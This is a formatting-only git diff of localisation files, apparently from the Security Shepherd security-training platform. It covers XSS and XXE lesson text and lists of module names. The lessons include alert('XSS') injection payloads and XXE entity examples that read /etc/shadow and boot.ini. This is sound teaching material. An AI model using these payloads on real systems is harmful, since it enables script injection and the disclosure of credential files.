-paragraph.info.2=\u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528XSS\u653B\u51FB\u6765\u6267\u884C\u5728\u53D7\u5BB3\u8005\u7684\u6D4F\u89C8\u5668\u7684\u811A\u672C,\u5B83\u53EF\u4EE5\u52AB\u6301\u7528\u6237\u4F1A\u8BDD,\u7834\u574F\u7F51\u7AD9,\u6216\u8005\u5C06\u7528\u6237\u91CD\u5B9A\u5411\u5230\u4EFB\u610F\u6076\u610F\u7F51\u7AD9.\u53EF\u4EE5\u5C06\u6570\u636E\u53D1\u9001\u5230\u7CFB\u7EDF\u7684\u4EFB\u4F55\u4EBA,\u5305\u62EC\u7BA1\u7406\u5458,\u90FD\u53EF\u7528\u6765\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6267\u884C\u8DE8\u7AD9\u811A\u672C\u653B\u51FB.
-paragraph.info.3=\u6839\u636EOWASP\uFF0CXSS\u662F\u76EE\u524D\u5728Web\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6700\u666E\u904D\u7684\u6F0F\u6D1E.\u8FD9\u90E8\u5206\u662F\u7531\u4E8E\u53EF\u4F7F\u7528\u7684\u653B\u51FB<a>\u5A92\u4ECB</a>.\u800C\u663E\u793AXSS\u653B\u51FB\u662F\u5426\u6267\u884C\u7684\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528\u4E00\u4E2A<a>\u8B66\u544A</a>\u8B66\u544A\u6846\u4F5C\u4E3A\u5BA2\u6237\u7AEF\u811A\u672C\u6709\u6548\u8D1F\u8F7D.\u8981\u6267\u884C\u4E00\u4E2AXSS\u6709\u6548\u8D1F\u8F7D,\u4E00\u4E2A\u653B\u51FB\u5411\u91CF\u7684\u591A\u6837\u5316\u5C06\u53EF\u80FD\u662F\u5FC5\u8981\u7684\u7528\u4EE5\u514B\u670D\u4E0D\u8DB3\u7684\u8F6C\u4E49\u6216\u9A8C\u8BC1.\u4EE5\u4E0B\u662F\u4E00\u4E9B\u5DF2\u77E5\u7684\u653B\u51FB\u6E90\u7684\u4F8B\u5B50,\u4ED6\u4EEC\u90FD\u5F39\u51FA\u76F8\u540C\u7684<a>alert</a>\u7A97\u53E3,\u4E0A\u9762\u5199\u7740\u201CXSS\u201D.
-example.xss.1=&lt;SCRIPT&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/SCRIPT&gt;
-example.xss.2=&lt;IMG SRC=&quot;&#x23;&quot; ONERROR=&quot;<a>alert(&#39;XSS&#39;)</a>&quot;/&gt;
-example.xss.3=&lt;INPUT TYPE=&quot;BUTTON&quot; ONCLICK=&quot;<a>alert(&#39;XSS&#39;)</a>&quot;/&gt;
-example.xss.4=&lt;IFRAME SRC=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/IFRAME&gt;
-paragraph.whattodo.xss=\u4EE5\u4E0B\u8FD9\u4E9B\u641C\u7D22\u680F\u8F93\u51FA\u4E0D\u53EF\u4FE1\u7684\u6570\u636E,\u6CA1\u6709\u4EFB\u4F55\u7684\u9A8C\u8BC1\u548C\u8F6C\u4E49,\u901A\u8FC7\u8FD9\u4E9B\u529F\u80FD\u4F7F\u4E00\u4E2A\u8B66\u544A\u6846\u5F97\u4EE5\u6267\u884C,\u6765\u663E\u793A\u6709\u4E00\u4E2A\u8DE8\u7AD9\u811A\u672C\u653B\u51FB\u6F0F\u6D1E\u5B58\u5728.
-paragraph.info.searchTerm=\u8BF7\u8F93\u5165\u60A8\u8981\u67E5\u627E\u7684\u5173\u952E\u5B57<a>\u641C\u7D22</a>
-sentence.question.wouldYouLikeHint=\u9700\u8981\u63D0\u793A\u5417?
-word.info.loading=\u52A0\u8F7D\u4E2D...
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-button.getUser=\u83B7\u53D6\u8FD9\u4E2A\u7528\u6237
-error.occurred=\u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
+title.question.xss = \u4EC0\u4E48\u662F\u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS)
+paragraph.info.1 =  \u8DE8\u7AD9\u811A\u672C\u653B\u51FB (XSS) \u7684\u53D1\u751F\u662F\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5728 WEB \u6D4F\u89C8\u5668\u4E2D\u4F7F\u7528\u4E0D\u53EF\u9760\u7684\u6570\u636E\uFF0C\u6CA1\u6709\u8DB3\u591F\u7684<a>\u9A8C\u8BC1</a> \u6216 <a>\u8F6C\u4E49</a>.\u5982\u679C<a>\u4E0D\u53EF\u9760\u7684</a>\u6570\u636E\u5305\u542B\u5BA2\u6237\u7AEF\u7684\u4EE3\u7801,\u6D4F\u89C8\u5668\u5C06\u6267\u884C\u8BE5\u811A\u672C\uFF0C\u5F53\u5B83\u8BFB\u53D6\u8BE5\u9875\u9762\u65F6.
+paragraph.info.2 = \u653B\u51FB\u8005\u53EF\u4EE5\u4F7F\u7528XSS\u653B\u51FB\u6765\u6267\u884C\u5728\u53D7\u5BB3\u8005\u7684\u6D4F\u89C8\u5668\u7684\u811A\u672C,\u5B83\u53EF\u4EE5\u52AB\u6301\u7528\u6237\u4F1A\u8BDD,\u7834\u574F\u7F51\u7AD9,\u6216\u8005\u5C06\u7528\u6237\u91CD\u5B9A\u5411\u5230\u4EFB\u610F\u6076\u610F\u7F51\u7AD9.\u53EF\u4EE5\u5C06\u6570\u636E\u53D1\u9001\u5230\u7CFB\u7EDF\u7684\u4EFB\u4F55\u4EBA,\u5305\u62EC\u7BA1\u7406\u5458,\u90FD\u53EF\u7528\u6765\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6267\u884C\u8DE8\u7AD9\u811A\u672C\u653B\u51FB.
+paragraph.info.3 = \u6839\u636EOWASP\uFF0CXSS\u662F\u76EE\u524D\u5728Web\u5E94\u7528\u7A0B\u5E8F\u4E2D\u6700\u666E\u904D\u7684\u6F0F\u6D1E.\u8FD9\u90E8\u5206\u662F\u7531\u4E8E\u53EF\u4F7F\u7528\u7684\u653B\u51FB<a>\u5A92\u4ECB</a>.\u800C\u663E\u793AXSS\u653B\u51FB\u662F\u5426\u6267\u884C\u7684\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528\u4E00\u4E2A<a>\u8B66\u544A</a>\u8B66\u544A\u6846\u4F5C\u4E3A\u5BA2\u6237\u7AEF\u811A\u672C\u6709\u6548\u8D1F\u8F7D.\u8981\u6267\u884C\u4E00\u4E2AXSS\u6709\u6548\u8D1F\u8F7D,\u4E00\u4E2A\u653B\u51FB\u5411\u91CF\u7684\u591A\u6837\u5316\u5C06\u53EF\u80FD\u662F\u5FC5\u8981\u7684\u7528\u4EE5\u514B\u670D\u4E0D\u8DB3\u7684\u8F6C\u4E49\u6216\u9A8C\u8BC1.\u4EE5\u4E0B\u662F\u4E00\u4E9B\u5DF2\u77E5\u7684\u653B\u51FB\u6E90\u7684\u4F8B\u5B50,\u4ED6\u4EEC\u90FD\u5F39\u51FA\u76F8\u540C\u7684<a>alert</a>\u7A97\u53E3,\u4E0A\u9762\u5199\u7740\u201CXSS\u201D.
+example.xss.1 = &lt;SCRIPT&gt;<a>alert(&#39;XSS&#39;)</a>&lt;/SCRIPT&gt;
+example.xss.2 = &lt;IMG SRC=&quot;&#x23;&quot; ONERROR=&quot;<a>alert(&#39;XSS&#39;)</a>&quot;/&gt;
+example.xss.3 = &lt;INPUT TYPE=&quot;BUTTON&quot; ONCLICK=&quot;<a>alert(&#39;XSS&#39;)</a>&quot;/&gt;
+example.xss.4 = &lt;IFRAME SRC=&quot;javascript:<a>alert(&#39;XSS&#39;)</a>;&quot;&gt;&lt;/IFRAME&gt;
+paragraph.whattodo.xss = \u4EE5\u4E0B\u8FD9\u4E9B\u641C\u7D22\u680F\u8F93\u51FA\u4E0D\u53EF\u4FE1\u7684\u6570\u636E,\u6CA1\u6709\u4EFB\u4F55\u7684\u9A8C\u8BC1\u548C\u8F6C\u4E49,\u901A\u8FC7\u8FD9\u4E9B\u529F\u80FD\u4F7F\u4E00\u4E2A\u8B66\u544A\u6846\u5F97\u4EE5\u6267\u884C,\u6765\u663E\u793A\u6709\u4E00\u4E2A\u8DE8\u7AD9\u811A\u672C\u653B\u51FB\u6F0F\u6D1E\u5B58\u5728.
+paragraph.info.searchTerm = \u8BF7\u8F93\u5165\u60A8\u8981\u67E5\u627E\u7684\u5173\u952E\u5B57<a>\u641C\u7D22</a>
+sentence.question.wouldYouLikeHint = \u9700\u8981\u63D0\u793A\u5417?
+word.info.loading = \u52A0\u8F7D\u4E2D...
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+button.getUser = \u83B7\u53D6\u8FD9\u4E2A\u7528\u6237
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
 
 
diff --git a/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties b/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties
index a4aaedc07..2fe9e9f6b 100644
--- a/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties
+++ b/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties
@@ -1,15 +1,15 @@
-title.question.xxe=What is XML External Entity (XXE) Injection?
-paragraph.info.1=An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
-paragraph.info.2=The XML 1.0 standard defines a concept called an entity, which is a storage unit of some type. External entity can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI which can be accessed by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor accesses this tainted data and the XML processor may disclose confidential information normally not accessible by the application. 
-paragraph.info.3=Attacks can include;<ul><li>View the contents of local files</li> <li>Pivot to other internal systems disclosing content via http(s) requests or launching an CSRF attack</li><li>arbitrary code execution if the XML processor is vulnerable to client-side memory corruption</li><li>DoS where local resources may not stop returning data</li></ul>
-example.text=Example
-example.xxe.1=&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;<br/>&lt;!DOCTYPE foo [  <br/>&lt;!ELEMENT foo ANY &gt;<br/>&lt;!ENTITY xxe SYSTEM &quot;<a>file:///etc/shadow</a>&quot; &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
-example.xxe.2=&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;<br/>&lt;!DOCTYPE foo [  <br/>&lt;!ELEMENT foo ANY &gt;<br/>&lt;!ENTITY xxe SYSTEM &quot;<a>file:///c:/boot.ini</a>&quot; &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
-paragraph.whattodo.xxe=To complete this lesson you must read the contents of the file
-paragraph.info.emailAddr=Please enter your <a>email</a> to reset the password
-word.info.loading=Loading...
-sentence.question.wouldYouLikeHint=Would you like a hint?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.resetPassword=Reset My Password
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xxe = What is XML External Entity (XXE) Injection?
+paragraph.info.1 = An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
+paragraph.info.2 = The XML 1.0 standard defines a concept called an entity, which is a storage unit of some type. External entity can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI which can be accessed by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor accesses this tainted data and the XML processor may disclose confidential information normally not accessible by the application. 
+paragraph.info.3 = Attacks can include;<ul><li>View the contents of local files</li> <li>Pivot to other internal systems disclosing content via http(s) requests or launching an CSRF attack</li><li>arbitrary code execution if the XML processor is vulnerable to client-side memory corruption</li><li>DoS where local resources may not stop returning data</li></ul>
+example.text = Example
+example.xxe.1 = &lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;<br/>&lt;!DOCTYPE foo [  <br/>&lt;!ELEMENT foo ANY &gt;<br/>&lt;!ENTITY xxe SYSTEM &quot;<a>file:///etc/shadow</a>&quot; &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
+example.xxe.2 = &lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;<br/>&lt;!DOCTYPE foo [  <br/>&lt;!ELEMENT foo ANY &gt;<br/>&lt;!ENTITY xxe SYSTEM &quot;<a>file:///c:/boot.ini</a>&quot; &gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
+paragraph.whattodo.xxe = To complete this lesson you must read the contents of the file
+paragraph.info.emailAddr = Please enter your <a>email</a> to reset the password
+word.info.loading = Loading...
+sentence.question.wouldYouLikeHint = Would you like a hint?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.resetPassword = Reset My Password
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties b/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties
index 651dcc1ae..5e43ec8bb 100644
--- a/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties
+++ b/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties
@@ -1,2 +1,2 @@
-mobileBlurb.vmLink.1=To complete this challenge you'll need to use the
-mobileBlurb.vmLink.2=app found in the <a href='http://bit.ly/latestShepherdRelease' target='_blank'>Security Shepherd Android Virtual Machine</a>.
+mobileBlurb.vmLink.1 = To complete this challenge you'll need to use the
+mobileBlurb.vmLink.2 = app found in the <a href='http://bit.ly/latestShepherdRelease' target='_blank'>Security Shepherd Android Virtual Machine</a>.
diff --git a/src/main/resources/i18n/moduleGenerics/moduleNames.properties b/src/main/resources/i18n/moduleGenerics/moduleNames.properties
index e342e9893..8bd1c433e 100644
--- a/src/main/resources/i18n/moduleGenerics/moduleNames.properties
+++ b/src/main/resources/i18n/moduleGenerics/moduleNames.properties
@@ -1,100 +1,101 @@
-broken.crypto=Broken Crypto
-broken.crypto.1=Broken Crypto 1
-broken.crypto.2=Broken Crypto 2
-broken.crypto.3=Broken Crypto 3
-broken.session.management=Broken Session Management
-client.side.injection=Client Side Injection
-client.side.injection.1=Client Side Injection 1
-client.side.injection.2=Client Side Injection 2
-content.provider.leakage=Content Provider Leakage
-content.provider.leakage.1=Content Provider Leakage 1
-cross.site.request.forgery=Cross Site Request Forgery
-cross.site.scripting=Cross Site Scripting
-cross.site.scripting.1=Cross Site Scripting 1
-cross.site.scripting.2=Cross Site Scripting 2
-cross.site.scripting.3=Cross Site Scripting 3
-cross.site.scripting.4=Cross Site Scripting 4
-cross.site.scripting.5=Cross Site Scripting 5
-cross.site.scripting.6=Cross Site Scripting 6
-csrf.1=CSRF 1
-csrf.2=CSRF 2
-csrf.3=CSRF 3
-csrf.4=CSRF 4
-csrf.5=CSRF 5
-csrf.6=CSRF 6
-csrf.7=CSRF 7
-csrf.json=CSRF JSON
-failure.to.restrict.url.access=Failure to Restrict URL Access
-failure.to.restrict.url.access.1=Failure to Restrict URL Access 1
-failure.to.restrict.url.access.2=Failure to Restrict URL Access 2
-failure.to.restrict.url.access.3=Failure to Restrict URL Access 3
-insecure.cryptographic.storage=Insecure Cryptographic Storage
-insecure.cryptographic.storage.challenge.1=Insecure Cryptographic Storage Challenge 1
-insecure.cryptographic.storage.challenge.2=Insecure Cryptographic Storage Challenge 2
-insecure.cryptographic.storage.challenge.3=Insecure Cryptographic Storage Challenge 3
-insecure.cryptographic.storage.challenge.4=Insecure Cryptographic Storage Challenge 4
-insecure.cryptographic.storage.home.made.key=Insecure Cryptographic Storage Home Made Keys
-insecure.data.storage=Insecure Data Storage
-insecure.data.storage.1=Insecure Data Storage 1
-insecure.data.storage.2=Insecure Data Storage 2
-insecure.data.storage.3=Insecure Data Storage 3
-insecure.direct.object.reference.bank=Insecure Direct Object Reference Bank
-insecure.direct.object.reference.challenge.1=Insecure Direct Object Reference Challenge 1
-insecure.direct.object.reference.challenge.2=Insecure Direct Object Reference Challenge 2
-insecure.direct.object.references=Insecure Direct Object References
-nosql.injection.one=NoSQL Injection One
-poor.authentication=Poor Authentication
-poor.authentication.1=Poor Authentication 1
-poor.authentication.2=Poor Authentication 2
-poor.data.validation=Poor Data Validation
-poor.data.validation.1=Poor Data Validation 1
-poor.data.validation.2=Poor Data Validation 2
-reverse.engineering=Reverse Engineering
-reverse.engineering.1=Reverse Engineering 1
-reverse.engineering.2=Reverse Engineering 2
-reverse.engineering.3=Reverse Engineering 3
-security.misconfig.cookie.flag=Security Misconfig Cookie Flag
-security.misconfiguration=Security Misconfiguration
-session.management.challenge.1=Session Management Challenge 1
-session.management.challenge.2=Session Management Challenge 2
-session.management.challenge.3=Session Management Challenge 3
-session.management.challenge.4=Session Management Challenge 4
-session.management.challenge.5=Session Management Challenge 5
-session.management.challenge.6=Session Management Challenge 6
-session.management.challenge.7=Session Management Challenge 7
-session.management.challenge.8=Session Management Challenge 8
-sql.injection=SQL Injection
-sql.injection.1=SQL Injection 1
-sql.injection.2=SQL Injection 2
-sql.injection.3=SQL Injection 3
-sql.injection.4=SQL Injection 4
-sql.injection.5=SQL Injection 5
-sql.injection.6=SQL Injection 6
-sql.injection.7=SQL Injection 7
-sql.injection.escaping=SQL Injection Escaping
-sql.injection.stored.procedure=SQL Injection Stored Procedure
-unintended.data.leakage=Unintended Data Leakage
-unintended.data.leakage.1=Unintended Data Leakage 1
-unintended.data.leakage.2=Unintended Data Leakage 2
-untrusted.input=Untrusted Input
-unvalidated.redirects.and.forwards=Unvalidated Redirects and Forwards
-xxe.lessons=XML External Entity (XXE) Injection
-xxe.injection.1=XXE Injection 1
-category.csrf=CSRF
-category.failure.to.restrict.url.access=Failure to Restrict URL Access
-category.injection=Injection
-category.insecure.cryptographic.storage=Insecure Cryptographic Storage
-category.insecure.direct.object.references=Insecure Direct Object References
-category.mobile.broken.crypto=Mobile Broken Crypto
-category.mobile.content.provider=Mobile Content Providers
-category.mobile.data.leakage=Mobile Data Leakage
-category.mobile.injection=Mobile Injection
-category.mobile.insecure.data.storage=Mobile Insecure Data Storage
-category.mobile.poor.authentication=Mobile Poor Authentication
-category.mobile.reverse.engineering=Mobile Reverse Engineering
-category.mobile.security.decisions.via.untrusted.input=Mobile Security Decisions via Untrusted Input
-category.poor.data.validation=Poor Data Validation
-category.security.misconfigurations=Security Misconfigurations
-category.session.management=Session Management
-category.unvalidated.redirects.and.forwards=Unvalidated Redirects and Forwards
-category.xss=XSS
+broken.crypto = Broken Crypto
+broken.crypto.1 = Broken Crypto 1
+broken.crypto.2 = Broken Crypto 2
+broken.crypto.3 = Broken Crypto 3
+broken.session.management = Broken Session Management
+client.side.injection = Client Side Injection
+client.side.injection.1 = Client Side Injection 1
+client.side.injection.2 = Client Side Injection 2
+content.provider.leakage = Content Provider Leakage
+content.provider.leakage.1 = Content Provider Leakage 1
+cross.site.request.forgery = Cross Site Request Forgery
+cross.site.scripting = Cross Site Scripting
+cross.site.scripting.1 = Cross Site Scripting 1
+cross.site.scripting.2 = Cross Site Scripting 2
+cross.site.scripting.3 = Cross Site Scripting 3
+cross.site.scripting.4 = Cross Site Scripting 4
+cross.site.scripting.5 = Cross Site Scripting 5
+cross.site.scripting.6 = Cross Site Scripting 6
+csrf.1 = CSRF 1
+csrf.2 = CSRF 2
+csrf.3 = CSRF 3
+csrf.4 = CSRF 4
+csrf.5 = CSRF 5
+csrf.6 = CSRF 6
+csrf.7 = CSRF 7
+csrf.json = CSRF JSON
+failure.to.restrict.url.access = Failure to Restrict URL Access
+failure.to.restrict.url.access.1 = Failure to Restrict URL Access 1
+failure.to.restrict.url.access.2 = Failure to Restrict URL Access 2
+failure.to.restrict.url.access.3 = Failure to Restrict URL Access 3
+insecure.cryptographic.storage = Insecure Cryptographic Storage
+insecure.cryptographic.storage.challenge.1 = Insecure Cryptographic Storage Challenge 1
+insecure.cryptographic.storage.challenge.2 = Insecure Cryptographic Storage Challenge 2
+insecure.cryptographic.storage.challenge.3 = Insecure Cryptographic Storage Challenge 3
+insecure.cryptographic.storage.challenge.4 = Insecure Cryptographic Storage Challenge 4
+insecure.cryptographic.storage.home.made.key = Insecure Cryptographic Storage Home Made Keys
+insecure.data.storage = Insecure Data Storage
+insecure.data.storage.1 = Insecure Data Storage 1
+insecure.data.storage.2 = Insecure Data Storage 2
+insecure.data.storage.3 = Insecure Data Storage 3
+insecure.direct.object.reference.bank = Insecure Direct Object Reference Bank
+insecure.direct.object.reference.challenge.1 = Insecure Direct Object Reference Challenge 1
+insecure.direct.object.reference.challenge.2 = Insecure Direct Object Reference Challenge 2
+insecure.direct.object.references = Insecure Direct Object References
+nosql.injection.one = NoSQL Injection One
+poor.authentication = Poor Authentication
+poor.authentication.1 = Poor Authentication 1
+poor.authentication.2 = Poor Authentication 2
+poor.data.validation = Poor Data Validation
+poor.data.validation.1 = Poor Data Validation 1
+poor.data.validation.2 = Poor Data Validation 2
+reverse.engineering = Reverse Engineering
+reverse.engineering.1 = Reverse Engineering 1
+reverse.engineering.2 = Reverse Engineering 2
+reverse.engineering.3 = Reverse Engineering 3
+security.misconfig.cookie.flag = Security Misconfig Cookie Flag
+security.misconfiguration = Security Misconfiguration
+session.management.challenge.1 = Session Management Challenge 1
+session.management.challenge.2 = Session Management Challenge 2
+session.management.challenge.3 = Session Management Challenge 3
+session.management.challenge.4 = Session Management Challenge 4
+session.management.challenge.5 = Session Management Challenge 5
+session.management.challenge.6 = Session Management Challenge 6
+session.management.challenge.7 = Session Management Challenge 7
+session.management.challenge.8 = Session Management Challenge 8
+sql.injection = SQL Injection
+sql.injection.1 = SQL Injection 1
+sql.injection.2 = SQL Injection 2
+sql.injection.3 = SQL Injection 3
+sql.injection.4 = SQL Injection 4
+sql.injection.5 = SQL Injection 5
+sql.injection.6 = SQL Injection 6
+sql.injection.7 = SQL Injection 7
+sql.injection.escaping = SQL Injection Escaping
+sql.injection.stored.procedure = SQL Injection Stored Procedure
+unintended.data.leakage = Unintended Data Leakage
+unintended.data.leakage.1 = Unintended Data Leakage 1
+unintended.data.leakage.2 = Unintended Data Leakage 2
+untrusted.input = Untrusted Input
+unvalidated.redirects.and.forwards = Unvalidated Redirects and Forwards
+xxe.lessons = XML External Entity (XXE) Injection
+xxe.injection.1 = XXE Injection 1
+
+category.csrf = CSRF
+category.failure.to.restrict.url.access = Failure to Restrict URL Access
+category.injection = Injection
+category.insecure.cryptographic.storage = Insecure Cryptographic Storage
+category.insecure.direct.object.references = Insecure Direct Object References
+category.mobile.broken.crypto = Mobile Broken Crypto
+category.mobile.content.provider = Mobile Content Providers
+category.mobile.data.leakage = Mobile Data Leakage
+category.mobile.injection = Mobile Injection
+category.mobile.insecure.data.storage = Mobile Insecure Data Storage
+category.mobile.poor.authentication = Mobile Poor Authentication
+category.mobile.reverse.engineering = Mobile Reverse Engineering
+category.mobile.security.decisions.via.untrusted.input = Mobile Security Decisions via Untrusted Input
+category.poor.data.validation = Poor Data Validation
+category.security.misconfigurations = Security Misconfigurations
+category.session.management = Session Management
+category.unvalidated.redirects.and.forwards = Unvalidated Redirects and Forwards
+category.xss = XSS
diff --git a/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties b/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties
index bab06c183..38050d2ac 100644
--- a/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties
+++ b/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties
@@ -1,93 +1,94 @@
-broken.crypto=Briste Cripteagrafaíocht 
-broken.crypto.1=Briste Cripteagrafaíocht  1
-broken.crypto.2=Briste Cripteagrafaíocht  2
-broken.crypto.3=Briste Cripteagrafaíocht  3
-broken.session.management=Briste Bainisteoireacht an tSeisiúin
-client.side.injection=Instealladh Taobh Cliaint 
-client.side.injection.1=Instealladh Taobh Cliaint  1
-client.side.injection.2=Instealladh Taobh Cliaint  2
-content.provider.leakage=Soláthraí Sceitheadh Ábhair 
-cross.site.request.forgery=Trasna Suíomh Iarratas a Bhrionnú
-cross.site.scripting=Trasna Suíomh Scriptithe
-cross.site.scripting.1=Trasna Suíomh Scriptithe 1
-cross.site.scripting.2=Trasna Suíomh Scriptithe 2
-cross.site.scripting.3=Trasna Suíomh Scriptithe 3
-cross.site.scripting.4=Trasna Suíomh Scriptithe 4
-cross.site.scripting.5=Trasna Suíomh Scriptithe 5
-cross.site.scripting.6=Trasna Suíomh Scriptithe 6
-csrf.1=CSRF 1
-csrf.2=CSRF 2
-csrf.3=CSRF 3
-csrf.4=CSRF 4
-csrf.5=CSRF 5
-csrf.6=CSRF 6
-csrf.7=CSRF 7
-csrf.json=CSRF JSON
-failure.to.restrict.url.access=Neamhghnímh a Srian Rochtain a URL
-failure.to.restrict.url.access.1=Neamhghnímh a Srian Rochtain a URL 1
-failure.to.restrict.url.access.2=Neamhghnímh a Srian Rochtain a URL 2
-failure.to.restrict.url.access.3=Neamhghnímh a Srian Rochtain a URL 3
-insecure.cryptographic.storage=Éadaingean Cripteagrafaíocht Stóráil
-insecure.cryptographic.storage.challenge.1=Éadaingean Cripteagrafaíocht Stóráil 1
-insecure.cryptographic.storage.challenge.2=Éadaingean Cripteagrafaíocht Stóráil 2
-insecure.cryptographic.storage.challenge.3=Éadaingean Cripteagrafaíocht Stóráil 3
-insecure.cryptographic.storage.challenge.4=Éadaingean Cripteagrafaíocht Stóráil 4
-insecure.data.storage=Éadaingean Sonraí Stóráil
-insecure.data.storage.1=Éadaingean Sonraí Stóráil 1
-insecure.data.storage.2=Éadaingean Sonraí Stóráil 2
-insecure.data.storage.3=Éadaingean Sonraí Stóráil 3
-insecure.direct.object.reference.bank=Éadaingean Dír-Oibiacht Tagairt Banc
-insecure.direct.object.reference.challenge.1=Éadaingean Dír-Oibiacht Tagairt 1
-insecure.direct.object.reference.challenge.2=Éadaingean Dír-Oibiacht Tagairt 2
-insecure.direct.object.references=Éadaingean Dír-Oibiacht Tagairt
-nosql.injection.one=NoSQL Instealladh 1
-poor.authentication=Droch Fhíordheimhniú
-poor.authentication.1=Droch Fhíordheimhniú 1
-poor.data.validation=Droch Bailíochtú Sonraí
-poor.data.validation.1=Droch Bailíochtú Sonraí 1
-poor.data.validation.2=Droch Bailíochtú Sonraí 2
-reverse.engineering=Droim ar ais Innealtóireacht
-reverse.engineering.1=Innealtóireacht Droim ar ais  1
-reverse.engineering.2=Innealtóireacht Droim ar ais 2
-reverse.engineering.3=Innealtóireacht Droim ar ais 3
-security.misconfig.cookie.flag=Nach bhfuil slándáil chórais cumraithe mar is ceart Fianán Bratach
-security.misconfiguration=Nach bhfuil slándáil chórais cumraithe mar is ceart
-session.management.challenge.1=Bainisteoireacht an tSeisiúin 1
-session.management.challenge.2=Bainisteoireacht an tSeisiúin 2
-session.management.challenge.3=Bainisteoireacht an tSeisiúin 3
-session.management.challenge.4=Bainisteoireacht an tSeisiúin 4
-session.management.challenge.5=Bainisteoireacht an tSeisiúin 5
-session.management.challenge.6=Bainisteoireacht an tSeisiúin 6
-session.management.challenge.7=Bainisteoireacht an tSeisiúin 7
-session.management.challenge.8=Bainisteoireacht an tSeisiúin 8
-sql.injection=SQL Instealladh
-sql.injection.1=SQL Instealladh 1
-sql.injection.2=SQL Instealladh 2
-sql.injection.3=SQL Instealladh 3
-sql.injection.4=SQL Instealladh 4
-sql.injection.5=SQL Instealladh 5
-sql.injection.6=SQL Instealladh 6
-sql.injection.7=SQL Instealladh 7
-sql.injection.escaping=SQL Instealladh éalúcháin
-sql.injection.stored.procedure=SQL Instealladh stóráilte gníomh
-unintended.data.leakage=Neamhbheartaithe Sonraí Sceitheadh
-unintended.data.leakage.1=Neamhbheartaithe Sonraí Sceitheadh 1
-unintended.data.leakage.2=Neamhbheartaithe Sonraí Sceitheadh 2
-unvalidated.redirects.and.forwards=Atreorú agus ar aghaidh nach bailíochtaithe
-category.csrf=CSRF
-category.failure.to.restrict.url.access=Neamhghnímh a Srian Rochtain a URL
-category.injection=Instealladh
-category.insecure.cryptographic.storage=Éadaingean Cripteagrafaíocht Stóráil
-category.insecure.direct.object.references=Éadaingean Dír-Oibiacht Tagairt
-category.mobile.broken.crypto=Móibíleacha Briste Cripteagrafaíocht
-category.mobile.content.providers=Móibíleacha Soláthraithe Ábhar
-category.mobile.data.leakage=Móibíleacha Sonraí Sceitheadh
-category.mobile.injection=Móibíleacha Instealladh
-category.mobile.insecure.data.storage=Móibíleacha Éadaingean Sonraí Stóráil
-category.mobile.poor.authentication=Móibíleacha Droch Fhíordheimhniú
-category.mobile.reverse.engineering=Móibíleacha Innealtóireacht Droim ar ais
-category.poor.data.validation=Droch Bailíochtú Sonraí
-category.security.misconfigurations=Nach bhfuil slándáil chórais cumraithe mar is ceart
-category.session.management=Bainisteoireacht an tSeisiúin
